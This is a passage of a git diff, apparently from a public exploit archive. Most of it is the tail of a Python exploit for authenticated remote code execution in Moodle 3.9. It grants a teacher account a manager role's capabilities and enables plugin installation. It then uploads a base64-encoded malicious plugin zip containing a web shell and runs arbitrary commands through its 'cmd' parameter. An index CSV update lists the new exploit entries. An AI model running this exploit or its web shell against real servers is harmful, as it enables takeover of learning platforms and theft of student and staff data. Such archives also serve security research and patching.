configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:viewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent','1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:viewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry','1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/workshop:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_seb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items:addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addinstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')] + + r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post) + + # Above we modify description field, so, if script find that description on site, we are good. + if random_desc not in r.text: + p6.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nTrouble updating fields\n") + exit(1) + else: + r = session.get(url + '/admin/search.php') + if "Install plugins" not in r.text: + p6.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.") + print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n") + exit(1) + + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + p6.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + + return session, sess_key + +def zipb64_up(session, url, sess_key, teacher_user, course_id): + ''' + Doing upload of zip file as base64 binary data + * https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/ + ''' + + p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file") + + r = session.get(url + '/admin/tool/installaddon/index.php') + zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0] + client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0] + + # Upupup + data_get = {"action":"upload"} + data_post = { + "title" : "", + "author" : teacher_user, + "license" : "unknown", + "itemid" : [zipfile_id, zipfile_id], + "accepted_types[]" : [".zip",".zip"], + "repo_id" : course_id, + "p" : "", + "page" : "", + "env" : "filepicker", + "sesskey" : sess_key, + "client_id" : client_id, + "maxbytes" : "-1", + "areamaxbytes" : "-1", + "ctx_id" : "1", + "savepath" : "/" + } + + zip_b64 = 'UEsDBAoAAAAAAOVa0VAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAACATtFQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAAB2bdFQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACAD4W9FQA9MUliAAAAAeAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsS/IKFAoriwuSc3VUIl3dw2JVk/OTVGP1bRWsLcDAFBLAwQUAAAACAB6bdFQtXxvb0EAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDM0NzCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAA5VrRUAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGAB/2bACX0TWAWRC9B9fRNYBhvTzH19E1gFQSwECHwAKAAAAAACATtFQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgArE3mRVJE1gGOG/QfX0TWAYb08x9fRNYBUEsBAh8ACgAAAAAAdm3RUAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAMIcIaZyRNYBwhwhpnJE1gGOG/QfX0TWAVBLAQIfABQAAAAIAPhb0VAD0xSWIAAAAB4AAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgA1t0sN2BE1gHW3Sw3YETWAfYt6i9fRNYBUEsBAh8AFAAAAAgAem3RULV8b29BAAAASQAAAA8AJAAAAAAAAAAgAAAAygAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAO6e2qlyRNYB7p7aqXJE1gFkQvQfX0TWAVBLBQYAAAAABQAFANsBAAA4AQAAAAA=' + zip_file_bytes = zip_b64.encode('utf-8') + zip_file_b64 = base64.decodebytes(zip_file_bytes) + + data_file = [ + ('repo_upload_file', + ('rce.zip', zip_file_b64, 'application/zip'))] + + r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file) + if "rce.zip" not in r.text: + p7.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nError uploading zip file.\n") + exit(1) + + # Trying to load file + data_post = { + "sesskey" : sess_key, + "_qf__tool_installaddon_installfromzip_form" : "1", + "mform_showmore_id_general" : "0", + "mform_isexpanded_id_general" : "1", + "zipfile" : zipfile_id, + "plugintype" : "", + "rootdir" : "", + "submitbutton" : "Install plugin from the ZIP file" + } + + r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) + if "Validation successful, installation can continue" not in r.text: + p7.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nError uploading zip file, problems on plugin install.\n") + exit(1) + + # Confirm load + zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0] + data_post = { + "installzipcomponent" : "block_rce", + "installzipstorage" : zip_storage, + "installzipconfirm" : "1", + "sesskey" : sess_key + } + + r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) + if "Current release information" not in r.text: + p7.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nError uploading zip file, confirmation problems.\n") + exit(1) + + p7.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + + return session + +def moodle_RCE(url, command): + ''' + Remote Command Execution on system with plugin installed (malicious zip file) + ''' + + p8 = log.progress("Executing " + Color.BLUE + command + Color.END) + time.sleep(1) + + data_get = {"cmd" : command} + + try: + r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3) + p8.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + print("\n" + Color.YELLOW + r.text + Color.END) + except requests.exceptions.Timeout as e: + p8.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + pass + + print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END) + +if __name__ == '__main__': + args = arguments() + session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie) + enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index af83c88d3..bae62769b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43795,7 +43795,7 @@ id,file,description,date,author,type,platform,port 49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php, 49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php, 49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php, -49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php, +49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php, 49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple, 49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java, 49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php, @@ -44309,3 +44309,6 @@ id,file,description,date,author,type,platform,port 50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php, 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php, 50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java, +50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-08-05,splint3rsec,webapps,php, +50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php, +50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,